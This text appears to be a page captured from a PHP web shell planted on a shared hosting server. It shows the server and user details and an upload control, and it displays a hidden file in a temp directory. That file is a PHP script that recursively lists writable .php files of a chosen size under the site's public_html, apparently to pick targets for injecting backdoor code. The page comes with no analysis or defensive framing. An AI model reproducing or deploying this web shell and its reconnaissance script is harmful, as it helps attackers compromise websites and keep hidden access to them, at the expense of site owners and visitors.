HEX
Server: LiteSpeed
System: Linux l24.yourwebhosting.net 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64
User: turkishi (1582)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/turkishi/.cagefs/tmp/.multi
<?php   $min = (int)512; $max = (int)100000; if ($min < 1) {     $min = 1; } if ($max < $min) {     $max = $min; }  function scan_sized($path, $root, $min, $max) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . '/' . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_file($p) && substr($p, -4) == '.php' && is_writeable($p)) {                     $sz = @filesize($p);                     if ($sz === false || $sz < $min || $sz > $max) {                         continue;                     }                     $res = str_replace($root, '', $p);                     print "<f>{$res}|{$sz}</f>";                 } elseif (is_dir($p)) {                     scan_sized($p, $root, $min, $max);                 }             }         }     } }  $r = "/home/turkishi/public_html"; scan_sized($r, $r, $min, $max); die('!ended!');